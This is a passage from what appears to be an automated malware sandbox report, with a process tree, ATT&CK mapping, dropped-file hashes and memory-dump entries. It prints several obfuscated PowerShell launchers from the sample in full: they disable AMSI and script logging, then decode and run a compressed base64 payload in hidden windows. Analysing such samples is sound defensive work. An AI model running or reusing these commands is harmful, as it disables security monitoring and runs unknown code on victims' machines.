HZzl6s+/5+0q1/cvsEr2PVNlS1QyE3IxVt2/XGKP5iu+/toaHs9kNltzW+17cGsbar/Du8/PAhqC9bg7rrmKyLQg383VutFbFOYC9CrjJZ1l2BX9tg9Xs2pmigN2K6qDeGpP1R00yCLYHhrSbubbL39iLWm164''+''BJ/M4NwOxjFrohXYHQUqeA{1}3gzgvLRN0tA0''+''lq+''+''HJWNiytkpk''+''7RThZ2Sdg2/N3AeVM3NcB//UbtvR2aVjjps+7mj1E+/zO6DkbEgYP2vOS+hPUav{1}vimF581HvHytD{1}VRkoaIAl+hwRTVohMnnbxrDGIiNGQZHh0rnDBMoVVDMy8STaU09kS/yroL9MpDBxMNdWhmHr30V5EeBCvHRlYsXVxMwUeRwV6th1nAw6qyO1MU6EDKTmllO{1}rr99Lj9V4GU1XRwQQqB8M0Mwy2yFKS5d8NE7xQOFTM14F6DTM4eQVFDiruo{1}gI5LQ4po9xO1zqgQFH1ACuBlx6Jp4mQAxQPsW3UomLzv34JVBKx7+TKnnxDOHj/xtVjmv/sPtL9FGqGS7PVp8uPGo5v+3+I0Q4yDnQBCg+PE''+''dehiFPjkeRTcdA/WU+''+''xOv8esNPr+C9lzWhvwEF54n/EgwAAA{0}{0}'')-f''='',''f'')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3928
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c $znP8=((''Scr''+''ipt''+''{1}''+''lock{0}oggi{2}''+''g'')-f''L'',''B'',''n'');If($PSVersionTable.PSVersion.Major -ge 3){ $btfZ=[Ref].Assembly.GetType(((''{1}''+''{''+''6}''+''ste''+''m''+''.{''+''0}{9}n{9}''+''{4}''+''emen''+''t.''+''{8}{2}t{7''+''}''+''m{9}ti''+''{7}n''+''.{8''+''}''+''ms''+''i{3''+''}ti''+''{5''+''}s'')-f''M'',''S'',''u'',''U'',''g'',''l'',''y'',''o'',''A'',''a'')); if ($btfZ) { $btfZ.GetField(((''''+''a''+''m{''+''4}iI{0''+''}''+''i{2}{''+''1''+''}''+''ail{3}d'')-f''n'',''F'',''t'',''e'',''s''),''NonPublic,Static'').SetValue($null,$true); }; $zW=((''{1}n''+''able{4}c{5}i{0}t''+''{2}''+''lockIn''+''{3}ocat''+''ionLogg''+''ing''+'''')-f''p'',''E'',''B'',''v'',''S'',''r''); $r8D=[Ref].Assembly.GetType(((''''+''{2}{4}stem.{3}''+''anag''+''e''+''men''+''t.A{5}to''+''mation.{0}ti{''+''1}s'')-f''U'',''l'',''S'',''M'',''y'',''u'')); $qOK=$r8D.GetField(''cachedGroupPolicySettings'',''NonPublic,Static''); If ($qOK) { $kMZ=$qOK.GetValue($null); $yIzcl=[Collections.Generic.Dictionary[string,System.Object]]::new(); $t8ZX7=((''En''+''a{3}le''+''{1''+''}criptB''+''loc{''+''2}{0}ogging'')-f''L'',''S'',''k'',''b''); If($kMZ[$znP8]){ $kMZ[$znP8][$zW]=0; $kMZ[$znP8][$t8ZX7]=0; } $yIzcl.Add($zW,0); $yIzcl.Add($t8ZX7,0); $kMZ[''HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\''+$znP8]=$yIzcl; } Else { [Ref].Assembly.GetType(((''Sy''+''s''+''tem.{5}''+''an''+''a{4}ement.A{3}''+''tomatio''+''n.Script{1}{0}''+''oc{''+''2}'')-f''l'',''B'',''k'',''u'',''g'',''M'')).GetField(''signatures'',''NonPublic,Static'').SetValue($null,(New-Object Collections.Generic.HashSet[string])); }};&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(((''H4sIAOp2bWcCA7VWbW/aS''+''BD+Xqn/waqQMAoBQ2''+''ibRqp0tjHBLiS4Duat6LTYi71lvSb2EiC9/vebNXZIlOSud1L3i727M7Ozzzwzs8sN8ziJmeQb0o+3b6R8DFCCIkku7Z3rqlQKw8pxq3SrR''+''tJn''+''SZ6p63U7jhBh84sL{1}ZMkmPHDvHaJuZqmOFpQglO5Iv0ljUKc4NPrxX{1}scemHVPqzdknjBaK52F5HXoilU5X5Yq8Xe0g4VXPWlHC5/O1buTI7bcxrxu0G0VQuO/uU46jmU1quSD8r4sCb/RrL5T7xkjiNl7w2IuysWRuyFC3xFVi7w33Mw9hPy3CX420SzDcJyy4lrBxk5DL8Dp''+''LYU30/wWlarkozYX82n/8hz/LDv24YJxGumYzjJF47OLkjHk5rXcR8ir/i5Ry0HJ4QFswrFRC7i1dYLrENpVXpv5iRr/C2gO5XleTHSiA14EmlCvF8{1}s1+7G8oPiiWX/BTUKAC40ADwO6ngG9Z0CY5''+''Q84LxDkuFGOW7WDwVx7EKcmUP0tKVerD0YjHyR6mpZtkgyvzB7SlUnJd/VVbjUIR1LbJ7SdYmrkx8edHA09CXwptI{1}I6jdt4SRhu7xmKiFcwVX4pHHhJcYZHrRC7Av/kcr6B''+''/TamOEBcICxY8UzNiAh/0NU2hPo4UT0IaQpeQbQrT505BE0um6yPI4DuMAealpaQH7iQznNiX5wu5iBU1ilK06o02ECCelXJwYhivyqpLCX5lrrhc{1}ZbPrrb31BOPJTywty88gTM/FA9ZilPNh6EFAC4cdbYI4gKPKp''+''Sl/hY2zskKA4vv4iGjiiFtAFLdxANWBEoOFwQJQE/gRSVmoO5Ga0pjkAiKxYdigIoDXlqZLxC''+''A{1}bLLzpZ''+''JMCB7QKTAox''+''HLkKgHRrzquSShEPhE{1}gKYv0PD54XHHBFT3AeFLnIq5m254L4pa0nuJlDkwGRcAChk8SRhlL8oXWoLPK7ukHa7w{1}t+F6FYXS+2q7mDN2p2{1}ct6p''+''jcmRikNwxDkzTMwFFPzpzV+qrvUZOcWbbT7qpJexcuVTM1ja62txua6nXJR9{1}ShkPQI3rP/r4zVV+LgnEw0b{1}mIBybcJDe''+''C8wAvpoZepoyVQJNMbl5aTg9W9cskLdbjWl2Tv2cauTeMR21OxLn2V''+''7XaqMdnGO0Wt3x7ka96ltq2Ln2O41mJzSIoq4cu2tPV5e9tpHNPTG3J6lBjM4E7Ni2G+KRu9ZGRmdqu2szONkGtturtzqhBusm2{1}XWTh1Go2HdM{1}++T8/v++Cu7U4tgqdmgPeBaquqM2HUWWx1VV9M3OYXV111hrC2ujHZzl6s+/5+0q1/cvsEr2PVNlS1QyE3IxVt2/XGKP5iu+/toaHs9kNltzW+17cGsbar/Du8/PAhqC9bg7rrmKyLQg383VutFbFOYC9CrjJZ1l2BX9tg9Xs2pmigN2K6qDeGpP1R00yCLYHhrSbubbL39iLWm164''+''BJ/M4NwOxjFrohXYHQUqeA{1}3gzgvLRN0tA0''+''lq+''+''HJWNiytkpk''+''7RThZ2Sdg2/N3AeVM3NcB//UbtvR2aVjjps+7mj1E+/zO6DkbEgYP2vOS+hPUav{1}vimF581HvHytD{1}VRkoaIAl+hwRTVohMnnbxrDGIiNGQZHh0rnDBMoVVDMy8STaU09kS/yroL9MpDBxMNdWhmHr30V5EeBCvHRlYsXVxMwUeRwV6th1nAw6qyO1MU6EDKTmllO{1}rr99Lj9V4GU1XRwQQqB8M0Mwy2yFKS5d8NE7xQOFTM14F6DTM4eQVFDiruo{1}gI5LQ4po9xO1zqgQFH1ACuBlx6Jp4mQAxQPsW3UomLzv34JVBKx7+TKnnxDOHj/xtVjmv/sPtL9FGqGS7PVp8uPGo5v+3+I0Q4yDnQBCg+PE''+''dehiFPjkeRTcdA/WU+''+''xOv8esNPr+C9lzWhvwEF54n/EgwAAA{0}{0}'')-f''='',''f'')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:652
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" -noni -nop -w hidden -c $znP8=(('Scr'+'ipt'+'{1}'+'lock{0}oggi{2}'+'g')-f'L','B','n');If($PSVersionTable.PSVersion.Major -ge 3){ $btfZ=[Ref].Assembly.GetType((('{1}'+'{'+'6}'+'ste'+'m'+'.{'+'0}{9}n{9}'+'{4}'+'emen'+'t.'+'{8}{2}t{7'+'}'+'m{9}ti'+'{7}n'+'.{8'+'}'+'ms'+'i{3'+'}ti'+'{5'+'}s')-f'M','S','u','U','g','l','y','o','A','a')); if ($btfZ) { $btfZ.GetField(((''+'a'+'m{'+'4}iI{0'+'}'+'i{2}{'+'1'+'}'+'ail{3}d')-f'n','F','t','e','s'),'NonPublic,Static').SetValue($null,$true); }; $zW=(('{1}n'+'able{4}c{5}i{0}t'+'{2}'+'lockIn'+'{3}ocat'+'ionLogg'+'ing'+'')-f'p','E','B','v','S','r'); $r8D=[Ref].Assembly.GetType(((''+'{2}{4}stem.{3}'+'anag'+'e'+'men'+'t.A{5}to'+'mation.{0}ti{'+'1}s')-f'U','l','S','M','y','u')); $qOK=$r8D.GetField('cachedGroupPolicySettings','NonPublic,Static'); If ($qOK) { $kMZ=$qOK.GetValue($null); $yIzcl=[Collections.Generic.Dictionary[string,System.Object]]::new(); $t8ZX7=(('En'+'a{3}le'+'{1'+'}criptB'+'loc{'+'2}{0}ogging')-f'L','S','k','b'); If($kMZ[$znP8]){ $kMZ[$znP8][$zW]=0; $kMZ[$znP8][$t8ZX7]=0; } $yIzcl.Add($zW,0); $yIzcl.Add($t8ZX7,0); $kMZ['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\'+$znP8]=$yIzcl; } Else { [Ref].Assembly.GetType((('Sy'+'s'+'tem.{5}'+'an'+'a{4}ement.A{3}'+'tomatio'+'n.Script{1}{0}'+'oc{'+'2}')-f'l','B','k','u','g','M')).GetField('signatures','NonPublic,Static').SetValue($null,(New-Object Collections.Generic.HashSet[string])); }};&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAOp2bWcCA7VWbW/aS'+'BD+Xqn/waqQMAoBQ2'+'ibRqp0tjHBLiS4Duat6LTYi71lvSb2EiC9/vebNXZIlOSud1L3i727M7Ozzzwzs8sN8ziJmeQb0o+3b6R8DFCCIkku7Z3rqlQKw8pxq3SrR'+'tJn'+'SZ6p63U7jhBh84sL{1}ZMkmPHDvHaJuZqmOFpQglO5Iv0ljUKc4NPrxX{1}scemHVPqzdknjBaK52F5HXoilU5X5Yq8Xe0g4VXPWlHC5/O1buTI7bcxrxu0G0VQuO/uU46jmU1quSD8r4sCb/RrL5T7xkjiNl7w2IuysWRuyFC3xFVi7w33Mw9hPy3CX420SzDcJyy4lrBxk5DL8Dp'+'LYU30/wWlarkozYX82n/8hz/LDv24YJxGumYzjJF47OLkjHk5rXcR8ir/i5Ry0HJ4QFswrFRC7i1dYLrENpVXpv5iRr/C2gO5XleTHSiA14EmlCvF8{1}s1+7G8oPiiWX/BTUKAC40ADwO6ngG9Z0CY5'+'Q84LxDkuFGOW7WDwVx7EKcmUP0tKVerD0YjHyR6mpZtkgyvzB7SlUnJd/VVbjUIR1LbJ7SdYmrkx8edHA09CXwptI{1}I6jdt4SRhu7xmKiFcwVX4pHHhJcYZHrRC7Av/kcr6B'+'/TamOEBcICxY8UzNiAh/0NU2hPo4UT0IaQpeQbQrT505BE0um6yPI4DuMAealpaQH7iQznNiX5wu5iBU1ilK06o02ECCelXJwYhivyqpLCX5lrrhc{1}ZbPrrb31BOPJTywty88gTM/FA9ZilPNh6EFAC4cdbYI4gKPKp'+'Sl/hY2zskKA4vv4iGjiiFtAFLdxANWBEoOFwQJQE/gRSVmoO5Ga0pjkAiKxYdigIoDXlqZLxC'+'A{1}bLLzpZ'+'JMCB7QKTAox'+'HLkKgHRrzquSShEPhE{1}gKYv0PD54XHHBFT3AeFLnIq5m254L4pa0nuJlDkwGRcAChk8SRhlL8oXWoLPK7ukHa7w{1}t+F6FYXS+2q7mDN2p2{1}ct6p'+'jcmRikNwxDkzTMwFFPzpzV+qrvUZOcWbbT7qpJexcuVTM1ja62txua6nXJR9{1}ShkPQI3rP/r4zVV+LgnEw0b{1}mIBybcJDe'+'C8wAvpoZepoyVQJNMbl5aTg9W9cskLdbjWl2Tv2cauTeMR21OxLn2V'+'7XaqMdnGO0Wt3x7ka96ltq2Ln2O41mJzSIoq4cu2tPV5e9tpHNPTG3J6lBjM4E7Ni2G+KRu9ZGRmdqu2szONkGtturtzqhBusm2{1}XWTh1Go2HdM{1}++T8/v++Cu7U4tgqdmgPeBaquqM2HUWWx1VV9M3OYXV111hrC2ujHZzl6s+/5+0q1/cvsEr2PVNlS1QyE3IxVt2/XGKP5iu+/toaHs9kNltzW+17cGsbar/Du8/PAhqC9bg7rrmKyLQg383VutFbFOYC9CrjJZ1l2BX9tg9Xs2pmigN2K6qDeGpP1R00yCLYHhrSbubbL39iLWm164'+'BJ/M4NwOxjFrohXYHQUqeA{1}3gzgvLRN0tA0'+'lq+'+'HJWNiytkpk'+'7RThZ2Sdg2/N3AeVM3NcB//UbtvR2aVjjps+7mj1E+/zO6DkbEgYP2vOS+hPUav{1}vimF581HvHytD{1}VRkoaIAl+hwRTVohMnnbxrDGIiNGQZHh0rnDBMoVVDMy8STaU09kS/yroL9MpDBxMNdWhmHr30V5EeBCvHRlYsXVxMwUeRwV6th1nAw6qyO1MU6EDKTmllO{1}rr99Lj9V4GU1XRwQQqB8M0Mwy2yFKS5d8NE7xQOFTM14F6DTM4eQVFDiruo{1}gI5LQ4po9xO1zqgQFH1ACuBlx6Jp4mQAxQPsW3UomLzv34JVBKx7+TKnnxDOHj/xtVjmv/sPtL9FGqGS7PVp8uPGo5v+3+I0Q4yDnQBCg+PE'+'dehiFPjkeRTcdA/WU+'+'xOv8esNPr+C9lzWhvwEF54n/EgwAAA{0}{0}')-f'=','f')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1728

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1bad2704664b4c1a190586ec492be65f

SHA1
1c98e6645c66774152c184d23f7a3178ce522e7b

SHA256
5950586396814b38bfdbb86757839fc8c7ce3eb73577775473c29ce6be81fe3e

SHA512
668553c12f1e5560baba826d5c8b139d7c7e323b6aa4e3723aaca479850f898c147d63cb77d305d715044db1e75cf501d6502ca214c7ed05ded424b230893bb0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
5caad758326454b5788ec35315c4c304

SHA1
3aef8dba8042662a7fcf97e51047dc636b4d4724

SHA256
83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

SHA512
4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wnjkv1nf.mp3.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1572-11-0x00007FF83CED0000-0x00007FF83D991000-memory.dmp

Filesize
10.8MB

Download
memory/1572-12-0x00007FF83CED0000-0x00007FF83D991000-memory.dmp

Filesize
10.8MB

Download
memory/1572-0-0x00007FF83CED3000-0x00007FF83CED5000-memory.dmp

Filesize
8KB

Download
memory/1572-1-0x000001E1310D0000-0x000001E1310F2000-memory.dmp

Filesize
136KB

Download
memory/1572-51-0x00007FF83CED0000-0x00007FF83D991000-memory.dmp

Filesize
10.8MB

Download
memory/1728-52-0x000002AF02CA0000-0x000002AF02CA1000-memory.dmp

Filesize
4KB

Download
memory/1976-22-0x00007FF83CED0000-0x00007FF83D991000-memory.dmp

Filesize
10.8MB

Download
memory/1976-23-0x00007FF83CED0000-0x00007FF83D991000-memory.dmp

Filesize
10.8MB

Download
memory/1976-24-0x00007FF83CED0000-0x00007FF83D991000-memory.dmp

Filesize
10.8MB

Download
memory/1976-48-0x00007FF83CED0000-0x00007FF83D991000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing